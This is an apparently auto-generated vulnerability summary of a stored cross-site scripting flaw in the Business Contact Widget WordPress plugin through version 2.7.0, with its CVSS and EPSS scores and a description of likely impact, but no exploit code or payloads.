This vulnerability arises because the Business Contact Widget plugin stores user‑provided input unfiltered and later renders it as part of a web page. Because the content is not escaped, malicious JavaScript can be injected and will execute in the browsers of any visitor who loads the widget. The flaw is a stored cross‑site scripting (CWE‑79) that allows an attacker to run arbitrary code, steal cookies or session data, deface content, or redirect users. Based on the description, it is inferred that the attacker would need permission to submit or edit the widget content to inject malicious code.

All releases of StressFree Sites’ Business Contact Widget plugin up through version 2.7.0 are affected. The vulnerability has existed since the plugin’s initial release, so every installation of the plugin prior to 2.7.0 remains potentially vulnerable. The plugin is deployed on WordPress sites and may be present in a wide range of websites.

The CVSS score of 5.9 indicates moderate severity, while the EPSS score of less than 1% implies a very low current exploitation probability. The vulnerability is not listed in the CISA KEV catalog. Although the exact access requirements are not specified, it is inferred that an attacker would need the ability to create or edit the widget in order to store malicious input. Once the code is stored, it will run for any page visitor, potentially affecting a broad audience.